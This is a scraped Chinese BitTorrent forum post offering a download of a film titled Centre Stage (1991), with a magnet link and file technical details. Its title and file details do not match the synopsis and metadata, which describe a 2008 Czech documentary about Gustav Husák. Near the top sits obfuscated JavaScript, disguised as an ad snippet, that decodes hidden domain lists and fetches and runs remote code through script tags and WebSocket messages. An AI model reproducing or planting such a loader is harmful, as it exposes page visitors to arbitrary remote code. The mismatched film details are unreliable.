影帝胡萨克[粤语音轨/双语字幕].Centre.Stage.1991.1080p.BluRay.DD2.0.x265-10bit-迅雷下载 11.47GB

版主小s 26天前 173

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 影帝胡萨克

◎片 名 V hlavní roli Gustav Husák

◎年 代 2008

◎产 地 捷克

◎类 别 纪录片 / 历史

◎语 言 捷克语

◎上映日期 2008-10(捷克)

◎IMDb评分 0/10 from 0 users

◎IMDb链接 https://www.imdb.com/title/tt3620008/

◎豆瓣评分 /10 from 0 users

◎豆瓣链接 https://movie.douban.com/subject/30237585/

◎片 长 118分钟

◎标 签 捷克

◎简 介

Memories of eyewitnesses, a portrait of a left-wing intellectual viewed from different angles and illustrated with archive materials and a theatre mis-en-scene. A man who used power to promote the Communist Party policy in Slovakia only to become its victim when sentenced to life. A story of a career politic who became a representative of the Prague Spring when released, and then ended up being a president of oblivion, an icon of normalization and decay of the Czechoslovak state.

  1. General

  2. Unique ID : 87120584575814892398114211807727002137 (0x418AD07363C86ADBA49F69AFADB12219)

  3. Complete name : Centre.Stage.1991.1080p.BluRay.DD2.0.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.5 GiB

  7. Duration : 2 h 34 min

  8. Overall bit rate : 10.7 Mb/s

  9. Movie name : Centre Stage 1991 1080p BluRay DD2.0 x265-10bit-HDS

  10. Encoded date : UTC 2021-07-06 03:50:19

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 34 min

  20. Bit rate : 10.2 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.213

  30. Stream size : 10.9 GiB (95%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : AC-3

  38. Format/Info : Audio Coding 3

  39. Commercial name : Dolby Digital

  40. Codec ID : A_AC3

  41. Duration : 2 h 34 min

  42. Bit rate mode : Constant

  43. Bit rate : 448 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : L R

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 31.250 FPS (1536 SPF)

  48. Compression mode : Lossy

  49. Stream size : 494 MiB (4%)

  50. Title : Cantonese

  51. Language : Chinese

  52. Service kind : Complete Main

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 2 h 32 min

  62. Bit rate : 35.2 kb/s

  63. Count of elements : 2804

  64. Stream size : 38.3 MiB (0%)

  65. Title : CHS&ENG

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 2 h 32 min

  76. Bit rate : 20.7 kb/s

  77. Count of elements : 2758

  78. Stream size : 22.5 MiB (0%)

  79. Title : CHS

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Text #3

  84. ID : 5

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 2 h 32 min

  90. Bit rate : 20.9 kb/s

  91. Count of elements : 2758

  92. Stream size : 22.7 MiB (0%)

  93. Title : CHT

  94. Language : Chinese

  95. Default : No

  96. Forced : No


  97. Menu

  98. 00:00:00.000 : en:Chapter 01

  99. 00:12:19.708 : en:Chapter 02

  100. 00:24:01.167 : en:Chapter 03

  101. 00:33:18.583 : en:Chapter 04

  102. 00:48:30.250 : en:Chapter 05

  103. 01:02:34.583 : en:Chapter 06

  104. 01:12:55.625 : en:Chapter 07

  105. 01:25:09.292 : en:Chapter 08

  106. 01:36:20.833 : en:Chapter 09

  107. 01:49:11.750 : en:Chapter 10

  108. 02:00:18.167 : en:Chapter 11

  109. 02:15:32.625 : en:Chapter 12


TAGS 纪录片 历史

磁力链:
  • magnet:?xt=urn:btih:5E2D6801AF384E2E28F76FC7A8D70DF2285A1E2C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回